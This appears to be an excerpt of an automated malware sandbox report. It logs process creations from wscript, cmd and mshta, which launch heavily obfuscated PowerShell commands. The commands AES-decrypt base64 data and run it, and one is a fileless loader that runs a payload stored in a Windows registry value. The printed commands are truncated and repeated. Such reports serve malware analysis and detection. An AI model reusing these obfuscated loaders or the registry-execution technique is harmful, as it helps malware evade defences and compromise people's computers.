Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript) Then:QyRjCF9 = u73C8f8("05372A7A625E55"):IbQieBF CkqJQ5b, u73C8f8("02222B2231060A1A63770F7A402F3B63353A321B075826202C"),0,true:Do:OjmX2HP = 6:Loop:Else:WScript.Quit:End If:For C0CIO3w = 2 To 8:iJ3a4xQ = C0CIO3w + 70:Next:End If:For IT1NO2a = 5 To 12:iast6gt = IT1NO2a + 8:Next:Qm3HFSZ = "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" &_"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" &_"gvtyWhS6f/yLuZQGPPG3Kyk9AAK7wINlylZ4OJk4pM+4Rojn/lsl/n39U18n5SxEEQ42VNrlWAiW3wwIRECFoAhd+ZL//WtpgKKLFNn3eYoJtA7Kk7uHy8udJuRHz+rAF3f0GCXU3GOKHrnWuMGXETtyOeLJj10B5vDoBTNtohhjKvWV+R0XwpS35cbPg54bf+tpdEJROx3Qd8biObLuWfZibJaduCUwRuNLmYJFnQyN1F/8Dytkt4AS41I87pmgd6v+PGZRBcq2Ae/7uDMX5Z9aSQM6RazbMWy9d
Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, ListDecorator.cs | .Net Code: Read
Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, ListDecorator.cs | .Net Code: Read
Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 
'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKlJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = 